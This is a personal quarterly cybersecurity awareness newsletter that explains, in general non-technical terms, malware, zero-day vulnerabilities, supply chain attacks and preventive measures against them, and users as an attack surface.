I am bringing out this quarterly newsletter, summarizing my key article publications done during the first quarter of 2024. Thanks for the great responses to my cybertalks. It has been an exciting journey so far.
Malware in simple terms is malicious software. It is designed to get into the victim’s computer systems via various means, such as social engineering techniques, visiting bad or already infected websites, opening insecure email attachments etc. Once they get into our computer they execute their malicious code, which is also called payload. In order to continue to exist in our system, they change various settings such as registry entries. Then the exploitation starts, with one or more possibilities such as:
· Malware sending sensitive information to the criminal hacker
· Allowing hackers to remote control the system
· Registering your system as part of a malicious botnet, which can be leveraged for various means, such as DDoS attacks
· Locking files and seeking ransom to release
Zero-day vulnerabilities are security flaws or weaknesses in software unknown to the vendor or the public. Why these are called zero days? Because developers have literally "zero days" to fix the vulnerability or release a patch before it is exploited by criminal hackers. In other words, the vulnerability becomes known to attackers before it becomes known to the software or system's developer.
Zero-day vulnerabilities pose significant risks to our technology-fuelled digital world. There is absolutely no way that one can build a flawless system. This is what is exploited as zero days. If everyone contributes in their best capacity to reduce risk, the negative impact can certainly be brought down. Security researchers to contribute via help reporting these vulnerabilities when they come across, and the general public and organizations apply patches in a timely manner. This is how we can reduce the risk of zero days.
Criminal hackers employ various tactics to get into an organization’s technology infrastructure. One of the indirect ways is via supply chain attacks. While the organization might have robust cybersecurity controls built in, the hackers might use the organization’s supply chain in this case to break in. The entry into the organization via suppliers or partners or any others in the supply chain is the modus operandi of a supply chain attack. How is it possible?
· Using the weakest link in the supply chain
· Injecting malware into one of the supply chain links
· Exploiting known vulnerabilities
· Introducing counterfeit hardware into the supply chain
The impact of a supply chain attack could be serious resulting in:
· Unauthorized access to sensitive information
· Intellectual Property losses
· Service disruption
· Lost reputation and customers
· Financial loss
While the impact seems worrisome, there are ways to prevent supply chain attacks as well:
· Employing detailed risk assessments of the supply chain
· Vendor assessments
· Follow security best practices such as encryption, digital signatures
· Establish the process for ensuring an authentic supply of hardware and software
Can users be leveraged as an attack surface in cyber attacks? Very much yes! While you and I might not be part of a computer system, our interaction channels create an extended attack surface for cybercriminals to launch attacks. What are the various channels?
· Phishing Attacks
· Weak Passwords
· Social Engineering
· Malware and Ransomware
· Unpatched systems
· Removable Media